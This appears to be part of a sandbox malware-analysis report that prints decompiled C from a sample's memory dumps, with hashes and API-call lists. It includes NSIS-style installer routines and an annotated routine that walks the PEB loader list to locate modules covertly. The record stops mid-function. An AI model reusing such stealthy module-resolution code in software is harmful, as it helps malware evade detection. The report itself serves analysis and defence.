E00406B2B(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
    signed int _v8;
    unsigned int _v12;
    signed int _v16;
    intOrPtr _v20;
    signed int _v24;
    signed int _v28;
    intOrPtr* _v32;
    signed int* _v36;
    signed int _v40;
    signed int _v44;
    intOrPtr _v48;
    intOrPtr _v52;
    void _v116;
    signed int _v176;
    signed int _v180;
    signed int _v240;
    signed int _t166;
    signed int _t168;
    intOrPtr _t175;
    signed int _t181;
    void* _t182;
    intOrPtr _t183;
    signed int* _t184;
    signed int _t186;
    signed int _t187;
    signed int* _t189;
    signed int _t190;
    intOrPtr* _t191;
    intOrPtr _t192;
    signed int _t193;
    signed int _t195;
    signed int _t200;
    signed int _t205;
    void* _t207;
    short _t208;
    signed char _t222;
    signed int _t224;
    signed int _t225;
    signed int* _t232;
    signed int _t233;
    signed int _t234;
    void* _t235;
    signed int _t236;
    signed int _t244;
    signed int _t246;
    signed int _t251;
    signed int _t254;
    signed int _t256;
    signed int _t259;
    signed int _t262;
    void* _t263;
    void* _t264;
    signed int _t267;
    intOrPtr _t269;
    intOrPtr _t271;
    signed int _t274;
    intOrPtr* _t275;
    unsigned int _t276;
    void* _t277;
    signed int _t278;
    intOrPtr* _t279;
    signed int _t281;
    intOrPtr _t282;
    intOrPtr _t283;
    signed int* _t284;
    signed int _t286;
    signed int _t287;
    signed int _t288;
    signed int _t296;
    signed int* _t297;
    intOrPtr _t298;
    void* _t299;

    _t278 = _a8;
    _t187 = 0x10;
    memset( &_v116, 0, _t187 << 2);
    _t189 = _a4;
    _t233 = _t278;
    do {
        _t166 = *_t189;
        _t189 = &(_t189[1]);
        *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) = *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
        _t233 = _t233 - 1;
    } while (_t233 != 0);
    if(_v116 != _t278) {
        _t279 = _a28;
        _t267 = *_t279;
        _t190 = 1;
        _a28 = _t267;
        _t234 = 0xf;
        while(1) {
            _t168 = 0;
            if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                break;
            }
            _t190 = _t190 + 1;
            if(_t190 <= _t234) {
                continue;
            }
            break;
        }
        _v8 = _t190;
        if(_t267 < _t190) {
            _a28 = _t190;
        }
        while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
            _t234 = _t234 - 1;
            if(_t234 != 0) {
                continue;
            }
            break;
        }
        _v28 = _t234;
        if(_a28 > _t234) {
            _a28 = _t234;
        }
        *_t279 = _a28;
        _t181 = 1 << _t190;
        while(_t190 < _t234) {
            _t182 = _t181 - *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
            if(_t182 < 0) {
                L64:
                return _t168 | 0xffffffff;
            }
            _t190 = _t190 + 1;
            _t181 = _t182 + _t182;
        }
        _t281 = _t234 << 2;
        _t191 = _t299 + _t281 - 0x70;
        _t269 = *_t191;
        _t183 = _t181 - _t269;
        _v52 = _t183;
        if(_t183 < 0) {
            goto L64;
        }
        _v176 = _t168;
        *_t191 = _t269 + _t183;
        _t192 = 0;
        _t235 = _t234 - 1;
        if(_t235 == 0) {
            L21:
            _t184 = _a4;
            _t271 = 0;
            do {
                _t193 = *_t184;
                _t184 = &(_t184[1]);
                if(_t193 != _t168) {
                    _t232 = _t299 + _t193 * 4 - 0xb0;
                    _t236 = *_t232;
                    *((intOrPtr*)(0x42ceb8 + _t236 * 4)) = _t271;
                    *_t232 = _t236 + 1;
                }
                _t271 = _t271 + 1;
            } while (_t271 < _a8);
            _v16 = _v16 | 0xffffffff;
            _v40 = _v40 & 0x00000000;
            _a8 = *((intOrPtr*)(_t299 + _t281 - 0xb0));
            _t195 = _v8;
            _t186 = ~_a28;
            _v12 = _t168;
            _v180 = _t168;
            _v36 = 0x42ceb8;
            _v240 = _t168;
            if(_t195 > _v28) {
                L62:
                _t168 = 0;
                if(_v52 == 0 || _v28 == 1) {
                    return _t168;
                } else {
                    goto L64;
                }
            }
            _v44 = _t195 - 1;
            _v32 = _t299 + _t195 * 4 - 0x70;
            do {
                _t282 = *_v32;
                if(_t282 == 0) {
                    goto L61;
                }
                while(1) {
                    _t283 = _t282 - 1;
                    _t200 = _a28 + _t186;
                    _v48 = _t283;
                    _v24 = _t200;
                    if(_v8 <= _t200) {
                        goto L45;
                    }
                    L31:
                    _v20 = _t283 + 1;
                    do {
                        _v16 = _v16 + 1;
                        _t296 = _v28 - _v24;
                        if(_t296 > _a28) {
                            _t296 = _a28;
                        }
                        _t222 = _v8 - _v24;
                        _t254 = 1 << _t222;
                        if(1 <= _v20) {
                            L40:
                            _t256 = *_a36;
                            _t168 = 1 << _t222;
                            _v40 = 1;
                            _t274 = _t256 + 1;
                            if(_t274 > 0x5a0) {
                                goto L64;
                            }
                        } else {
                            _t275 = _v32;
                            _t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                            if(_t222 >= _t296) {
                                goto L40;
                            }
                            while(1) {
                                _t222 = _t222 + 1;
                                if(_t222 >= _t296) {
                                    goto L40;
                                }
                                _t275 = _t275 + 4;
                                _t264 = _t263 + _t263;
                                _t175 = *_t275;
                                if(_t264 <= _t175) {
                                    goto L40;
                                }
                                _t263 = _t264 - _t175;
                            }
                            goto L40;
                        }
                        _t168 = _a32 + _t256 * 4;
                        _t297 = _t299 + _v16 * 4 - 0xec;
                        *_a36 = _t274;
                        _t259 = _v16;
                        *_t297 = _t168;
                        if(_t259 == 0) {
                            *_a24 = _t168;
                        } else {
                            _t276 = _v12;
                            _t298 = *((intOrPtr*)(_t297 - 4));
                            *(_t299 + _t259 * 4 - 0xb0) = _t276;
                            _a5 = _a28;
                            _a4 = _t222;
                            _t262 = _t276 >> _t186;
                            _a6 = (_t168 - _t298 >> 2) - _t262;
                            *(_t298 + _t262 * 4) = _a4;
                        }
                        _t224 = _v24;
                        _t186 = _t224;
                        _t225 = _t224 + _a28;
                        _v24 = _t225;
                    } while (_v8 > _t225);
                    L45:
                    _t284 = _v36;
                    _a5 = _v8 - _t186;
                    if(_t284 < 0x42ceb8 + _a8 * 4) {
                        _t205 = *_t284;
                        if(_t205 >= _a12) {
                            _t207 = _t205 - _a12 + _t205 - _a12;
                            _v36 = &(_v36[1]);
                            _a4 = *((intOrPtr*)(_t207 + _a20)) + 0x50;
                            _t208 = *((intOrPtr*)(_t207 + _a16));
                        } else {
                            _a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                            _t208 = *_t284;
                            _v36 = &(_t284[1]);
                        }
                        _a6 = _t208;
                    } else {
                        _a4 = 0xc0;
                    }
                    _t286 = 1 << _v8 - _t186;
                    _t244 = _v12 >> _t186;
                    while(_t244 < _v40) {
                        *(_t168 + _t244 * 4) = _a4;
                        _t244 = _t244 + _t286;
                    }
                    _t287 = _v12;
                    _t246 = 1 << _v44;
                    while((_t287 & _t246) != 0) {
                        _t287 = _t287 ^ _t246;
                        _t246 = _t246 >> 1;
                    }
                    _t288 = _t287 ^ _t246;
                    _v20 = 1;
                    _v12 = _t288;
                    _t251 = _v16;
                    if(((1 << _t186) - 0x00000001 & _t288) == *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                        L60:
                        if(_v48 != 0) {
                            _t282 = _v48;
                            _t283 = _t282 - 1;
                            _t200 = _a28 + _t186;
                            _v48 = _t283;
                            _v24 = _t200;
                            if(_v8 <= _t200) {
                                goto L45;
                            }
                            goto L31;
                        }
                        break;
                    } else {
                        goto L58;
                    }
                    do {
                        L58:
                        _t186 = _t186 - _a28;
                        _t251 = _t251 - 1;
                    } while (((1 << _t186) - 0x00000001 & _v12) != *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                    _v16 = _t251;
                    goto L60;
                }
                L61:
                _v8 = _v8 + 1;
                _v32 = _v32 + 4;
                _v44 = _v44 + 1;
            } while (_v8 <= _v28);
            goto L62;
        }
        _t277 = 0;
        do {
            _t192 = _t192 + *((intOrPtr*)(_t299 + _t277 - 0x6c));
            _t277 = _t277 + 4;
            _t235 = _t235 - 1;
            *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
        } while (_t235 != 0);
        goto L21;
    }
    *_a24 = *_a24 & 0x00000000;
    *_a28 = *_a28 & 0x00000000;
    return 0;
}

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                                                    • Instruction ID: 226139066da84df80bc4b15dd4b3e380d67d521acd3bdc5c46ce9393f3ccc406
                                                                                    • Opcode Fuzzy Hash: ac19822e65b9eb32b60c0006d09f593d524529e242751fff4e2df6e5f6ee417a
                                                                                    • Instruction Fuzzy Hash: 8BC13B71A00219CBDF14CF68C4905EEB7B2FF99314F26826AD856BB384D7346952CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			/* Decompiler output for the sample's module-lookup routine; the comments below are
                                                                                    			   editor annotations based on the documented x86 PEB / PEB_LDR_DATA /
                                                                                    			   LDR_DATA_TABLE_ENTRY layouts, not part of the sandbox output. */
                                                                                    			E737948E9(void* __eflags, intOrPtr _a4) {
                                                                                    				intOrPtr* _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				signed int _t35;
                                                                                    
                                                                                    				_v16 =  *[fs:0x30];                                  /* TEB->ProcessEnvironmentBlock (PEB) */
                                                                                    				_v12 =  *((intOrPtr*)(_v16 + 0xc));                  /* PEB->Ldr (PEB_LDR_DATA*) */
                                                                                    				_v20 =  *((intOrPtr*)(_v12 + 0xc));                  /* Ldr->InLoadOrderModuleList.Flink: list head used as loop sentinel */
                                                                                    				_v8 =  *((intOrPtr*)(_v12 + 0xc));                   /* current LDR_DATA_TABLE_ENTRY, starting at the first module */
                                                                                    				/* _t35 is never assigned here; it is a decompiler artifact of an unused register argument. */
                                                                                    				while(E7379482D(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {   /* compare entry->BaseDllName.Buffer against _a4 */
                                                                                    					_v8 =  *_v8;                                     /* advance to InLoadOrderLinks.Flink */
                                                                                    					if(_v8 != _v20) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					return 0;                                        /* wrapped around to the first entry: no match */
                                                                                    				}
                                                                                    				return  *((intOrPtr*)(_v8 + 0x28));                  /* match: entry->FullDllName.Buffer */
                                                                                    			}

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                    • Instruction ID: 4775a2760439c137d23ef2982d1923a7ef2b477834d5b782c4d93af9dc29442c
                                                                                    • Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
                                                                                    • Instruction Fuzzy Hash: A7014D78A14218EFDB41DF98D681A9DBBF9FB08220F118596E854E7321D330EE50EB44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E737946E6() {
                                                                                    
                                                                                    				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                                                                    			}


                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                    • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                                    • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                                    • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 83%
                                                                                    			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                                                                                    				struct HWND__* _v32;
                                                                                    				void* _v84;
                                                                                    				void* _v88;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				signed int _t35;
                                                                                    				signed int _t37;
                                                                                    				signed int _t39;
                                                                                    				struct HWND__* _t49;
                                                                                    				signed int _t67;
                                                                                    				struct HWND__* _t73;
                                                                                    				signed int _t86;
                                                                                    				struct HWND__* _t91;
                                                                                    				signed int _t99;
                                                                                    				int _t103;
                                                                                    				signed int _t115;
                                                                                    				signed int _t116;
                                                                                    				int _t117;
                                                                                    				signed int _t122;
                                                                                    				struct HWND__* _t125;
                                                                                    				struct HWND__* _t126;
                                                                                    				int _t127;
                                                                                    				long _t130;
                                                                                    				int _t132;
                                                                                    				int _t133;
                                                                                    				void* _t134;
                                                                                    
                                                                                    				_t115 = _a8;
                                                                                    				if(_t115 == 0x110 || _t115 == 0x408) {
                                                                                    					_t35 = _a12;
                                                                                    					_t125 = _a4;
                                                                                    					__eflags = _t115 - 0x110;
                                                                                    					 *0x42a084 = _t35;
                                                                                    					if(_t115 == 0x110) {
                                                                                    						 *0x42ec28 = _t125;
                                                                                    						 *0x42a098 = GetDlgItem(_t125, 1);
                                                                                    						_t91 = GetDlgItem(_t125, 2);
                                                                                    						_push(0xffffffff);
                                                                                    						_push(0x1c);
                                                                                    						 *0x429060 = _t91;
                                                                                    						E00403E83(_t125);
                                                                                    						SetClassLongA(_t125, 0xfffffff2,  *0x42e408);
                                                                                    						 *0x42e3ec = E0040140B(4);
                                                                                    						_t35 = 1;
                                                                                    						__eflags = 1;
                                                                                    						 *0x42a084 = 1;
                                                                                    					}
                                                                                    					_t122 =  *0x4091ac; // 0xffffffff
                                                                                    					_t133 = 0;
                                                                                    					_t130 = (_t122 << 6) +  *0x42ec40;
                                                                                    					__eflags = _t122;
                                                                                    					if(_t122 < 0) {
                                                                                    						L34:
                                                                                    						E00403ECF(0x40b);
                                                                                    						while(1) {
                                                                                    							_t37 =  *0x42a084;
                                                                                    							 *0x4091ac =  *0x4091ac + _t37;
                                                                                    							_t130 = _t130 + (_t37 << 6);
                                                                                    							_t39 =  *0x4091ac; // 0xffffffff
                                                                                    							__eflags = _t39 -  *0x42ec44;
                                                                                    							if(_t39 ==  *0x42ec44) {
                                                                                    								E0040140B(1);
                                                                                    							}
                                                                                    							__eflags =  *0x42e3ec - _t133;
                                                                                    							if( *0x42e3ec != _t133) {
                                                                                    								break;
                                                                                    							}
                                                                                    							__eflags =  *0x4091ac -  *0x42ec44; // 0xffffffff
                                                                                    							if(__eflags >= 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t116 =  *(_t130 + 0x14);
                                                                                    							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
                                                                                    							_push( *((intOrPtr*)(_t130 + 0x20)));
                                                                                    							_push(0xfffffc19);
                                                                                    							E00403E83(_t125);
                                                                                    							_push( *((intOrPtr*)(_t130 + 0x1c)));
                                                                                    							_push(0xfffffc1b);
                                                                                    							E00403E83(_t125);
                                                                                    							_push( *((intOrPtr*)(_t130 + 0x28)));
                                                                                    							_push(0xfffffc1a);
                                                                                    							E00403E83(_t125);
                                                                                    							_t49 = GetDlgItem(_t125, 3);
                                                                                    							__eflags =  *0x42ecac - _t133;
                                                                                    							_v32 = _t49;
                                                                                    							if( *0x42ecac != _t133) {
                                                                                    								_t116 = _t116 & 0x0000fefd | 0x00000004;
                                                                                    								__eflags = _t116;
                                                                                    							}
                                                                                    							ShowWindow(_t49, _t116 & 0x00000008);
                                                                                    							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                                                                                    							E00403EA5(_t116 & 0x00000002);
                                                                                    							_t117 = _t116 & 0x00000004;
                                                                                    							EnableWindow( *0x429060, _t117);
                                                                                    							__eflags = _t117 - _t133;
                                                                                    							if(_t117 == _t133) {
                                                                                    								_push(1);
                                                                                    							} else {
                                                                                    								_push(_t133);
                                                                                    							}
                                                                                    							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                                                                                    							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                                                                                    							__eflags =  *0x42ecac - _t133;
                                                                                    							if( *0x42ecac == _t133) {
                                                                                    								_push( *0x42a098);
                                                                                    							} else {
                                                                                    								SendMessageA(_t125, 0x401, 2, _t133);
                                                                                    								_push( *0x429060);
                                                                                    							}
                                                                                    							E00403EB8();
                                                                                    							E00405BC7(0x42a0a0, 0x42e420);
                                                                                    							E00405BE9(0x42a0a0, _t125, _t130,  &(0x42a0a0[lstrlenA(0x42a0a0)]),  *((intOrPtr*)(_t130 + 0x18)));
                                                                                    							SetWindowTextA(_t125, 0x42a0a0);
                                                                                    							_push(_t133);
                                                                                    							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                                                                                    							__eflags = _t67;
                                                                                    							if(_t67 != 0) {
                                                                                    								continue;
                                                                                    							} else {
                                                                                    								__eflags =  *_t130 - _t133;
                                                                                    								if( *_t130 == _t133) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								__eflags =  *(_t130 + 4) - 5;
                                                                                    								if( *(_t130 + 4) != 5) {
                                                                                    									DestroyWindow( *0x42e3f8);
                                                                                    									 *0x429870 = _t130;
                                                                                    									__eflags =  *_t130 - _t133;
                                                                                    									if( *_t130 <= _t133) {
                                                                                    										goto L58;
                                                                                    									}
                                                                                    									_t73 = CreateDialogParamA( *0x42ec20,  *_t130 +  *0x42e400 & 0x0000ffff, _t125,  *(0x4091b0 +  *(_t130 + 4) * 4), _t130);
                                                                                    									__eflags = _t73 - _t133;
                                                                                    									 *0x42e3f8 = _t73;
                                                                                    									if(_t73 == _t133) {
                                                                                    										goto L58;
                                                                                    									}
                                                                                    									_push( *((intOrPtr*)(_t130 + 0x2c)));
                                                                                    									_push(6);
                                                                                    									E00403E83(_t73);
                                                                                    									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                                                                                    									ScreenToClient(_t125, _t134 + 0x10);
                                                                                    									SetWindowPos( *0x42e3f8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                                                                                    									_push(_t133);
                                                                                    									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                                                    									__eflags =  *0x42e3ec - _t133;
                                                                                    									if( *0x42e3ec != _t133) {
                                                                                    										goto L61;
                                                                                    									}
                                                                                    									ShowWindow( *0x42e3f8, 8);
                                                                                    									E00403ECF(0x405);
                                                                                    									goto L58;
                                                                                    								}
                                                                                    								__eflags =  *0x42ecac - _t133;
                                                                                    								if( *0x42ecac != _t133) {
                                                                                    									goto L61;
                                                                                    								}
                                                                                    								__eflags =  *0x42eca0 - _t133;
                                                                                    								if( *0x42eca0 != _t133) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								goto L61;
                                                                                    							}
                                                                                    						}
                                                                                    						DestroyWindow( *0x42e3f8);
                                                                                    						 *0x42ec28 = _t133;
                                                                                    						EndDialog(_t125,  *0x429468);
                                                                                    						goto L58;
                                                                                    					} else {
                                                                                    						__eflags = _t35 - 1;
                                                                                    						if(_t35 != 1) {
                                                                                    							L33:
                                                                                    							__eflags =  *_t130 - _t133;
                                                                                    							if( *_t130 == _t133) {
                                                                                    								goto L61;
                                                                                    							}
                                                                                    							goto L34;
                                                                                    						}
                                                                                    						_push(0);
                                                                                    						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                                                    						__eflags = _t86;
                                                                                    						if(_t86 == 0) {
                                                                                    							goto L33;
                                                                                    						}
                                                                                    						SendMessageA( *0x42e3f8, 0x40f, 0, 1);
                                                                                    						__eflags =  *0x42e3ec;
                                                                                    						return 0 |  *0x42e3ec == 0x00000000;
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t125 = _a4;
                                                                                    					_t133 = 0;
                                                                                    					if(_t115 == 0x47) {
                                                                                    						SetWindowPos( *0x42a078, _t125, 0, 0, 0, 0, 0x13);
                                                                                    					}
                                                                                    					if(_t115 == 5) {
                                                                                    						asm("sbb eax, eax");
                                                                                    						ShowWindow( *0x42a078,  ~(_a12 - 1) & _t115);
                                                                                    					}
                                                                                    					if(_t115 != 0x40d) {
                                                                                    						__eflags = _t115 - 0x11;
                                                                                    						if(_t115 != 0x11) {
                                                                                    							__eflags = _t115 - 0x111;
                                                                                    							if(_t115 != 0x111) {
                                                                                    								L26:
                                                                                    								return E00403EEA(_t115, _a12, _a16);
                                                                                    							}
                                                                                    							_t132 = _a12 & 0x0000ffff;
                                                                                    							_t126 = GetDlgItem(_t125, _t132);
                                                                                    							__eflags = _t126 - _t133;
                                                                                    							if(_t126 == _t133) {
                                                                                    								L13:
                                                                                    								__eflags = _t132 - 1;
                                                                                    								if(_t132 != 1) {
                                                                                    									__eflags = _t132 - 3;
                                                                                    									if(_t132 != 3) {
                                                                                    										_t127 = 2;
                                                                                    										__eflags = _t132 - _t127;
                                                                                    										if(_t132 != _t127) {
                                                                                    											L25:
                                                                                    											SendMessageA( *0x42e3f8, 0x111, _a12, _a16);
                                                                                    											goto L26;
                                                                                    										}
                                                                                    										__eflags =  *0x42ecac - _t133;
                                                                                    										if( *0x42ecac == _t133) {
                                                                                    											_t99 = E0040140B(3);
                                                                                    											__eflags = _t99;
                                                                                    											if(_t99 != 0) {
                                                                                    												goto L26;
                                                                                    											}
                                                                                    											 *0x429468 = 1;
                                                                                    											L21:
                                                                                    											_push(0x78);
                                                                                    											L22:
                                                                                    											E00403E5C();
                                                                                    											goto L26;
                                                                                    										}
                                                                                    										E0040140B(_t127);
                                                                                    										 *0x429468 = _t127;
                                                                                    										goto L21;
                                                                                    									}
                                                                                    									__eflags =  *0x4091ac - _t133; // 0xffffffff
                                                                                    									if(__eflags <= 0) {
                                                                                    										goto L25;
                                                                                    									}
                                                                                    									_push(0xffffffff);
                                                                                    									goto L22;
                                                                                    								}
                                                                                    								_push(_t132);
                                                                                    								goto L22;
                                                                                    							}
                                                                                    							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                                                    							_t103 = IsWindowEnabled(_t126);
                                                                                    							__eflags = _t103;
                                                                                    							if(_t103 == 0) {
                                                                                    								goto L61;
                                                                                    							}
                                                                                    							goto L13;
                                                                                    						}
                                                                                    						SetWindowLongA(_t125, _t133, _t133);
                                                                                    						return 1;
                                                                                    					} else {
                                                                                    						DestroyWindow( *0x42e3f8);
                                                                                    						 *0x42e3f8 = _a12;
                                                                                    						L58:
                                                                                    						if( *0x42b0a0 == _t133 &&  *0x42e3f8 != _t133) {
                                                                                    							ShowWindow(_t125, 0xa);
                                                                                    							 *0x42b0a0 = 1;
                                                                                    						}
                                                                                    						L61:
                                                                                    						return 0;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                                                                    • ShowWindow.USER32(?), ref: 00403A09
                                                                                    • DestroyWindow.USER32 ref: 00403A1D
                                                                                    • SetWindowLongA.USER32 ref: 00403A39
                                                                                    • GetDlgItem.USER32 ref: 00403A5A
                                                                                    • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                                                                    • GetDlgItem.USER32 ref: 00403B23
                                                                                    • GetDlgItem.USER32 ref: 00403B2D
                                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403B47
                                                                                    • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
                                                                                    • GetDlgItem.USER32 ref: 00403C3E
                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                                                                    • EnableWindow.USER32(?,?), ref: 00403C71
                                                                                    • EnableWindow.USER32(?,?), ref: 00403C8C
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                                                                    • EnableMenuItem.USER32 ref: 00403CA9
                                                                                    • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
                                                                                    • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
                                                                                    • lstrlenA.KERNEL32(0042A0A0,?,0042A0A0,0042E420), ref: 00403CFD
                                                                                    • SetWindowTextA.USER32(?,0042A0A0), ref: 00403D0C
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 00403E40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 184305955-0
                                                                                    • Opcode ID: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                    • Instruction ID: f9ad972cf69bfdf420a9f6130eb54bdd223da945896b7aa78364cccc95eacf8d
                                                                                    • Opcode Fuzzy Hash: 65fa17c4123709d5ac1524d2e1c09fee4b4826ece0b4f58e8075cf8f39e92c43
                                                                                    • Instruction Fuzzy Hash: 9FC1D331604204AFDB21AF62ED45E2B3F6CEB44706F50053EF641B52E1C779A942DB5E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E0040361A(void* __eflags) {
                                                                                    				intOrPtr _v4;
                                                                                    				intOrPtr _v8;
                                                                                    				int _v12;
                                                                                    				int _v16;
                                                                                    				char _v20;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr* _t20;
                                                                                    				void* _t28;
                                                                                    				void* _t30;
                                                                                    				int _t31;
                                                                                    				void* _t34;
                                                                                    				int _t37;
                                                                                    				int _t38;
                                                                                    				int _t42;
                                                                                    				char _t62;
                                                                                    				CHAR* _t64;
                                                                                    				signed char _t68;
                                                                                    				CHAR* _t79;
                                                                                    				intOrPtr _t81;
                                                                                    				CHAR* _t85;
                                                                                    
                                                                                    				_t81 =  *0x42ec30;
                                                                                    				_t20 = E00405F57(3);
                                                                                    				_t88 = _t20;
                                                                                    				if(_t20 == 0) {
                                                                                    					_t79 = 0x42a0a0;
                                                                                    					"1033" = 0x7830;
                                                                                    					E00405AAE(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a0a0, 0);
                                                                                    					__eflags =  *0x42a0a0;
                                                                                    					if(__eflags == 0) {
                                                                                    						E00405AAE(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407342, 0x42a0a0, 0);
                                                                                    					}
                                                                                    					lstrcatA("1033", _t79);
                                                                                    				} else {
                                                                                    					E00405B25("1033",  *_t20() & 0x0000ffff);
                                                                                    				}
                                                                                    				E004038E3(_t76, _t88);
                                                                                    				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                                                                                    				 *0x42eca0 =  *0x42ec38 & 0x00000020;
                                                                                    				 *0x42ecbc = 0x10000;
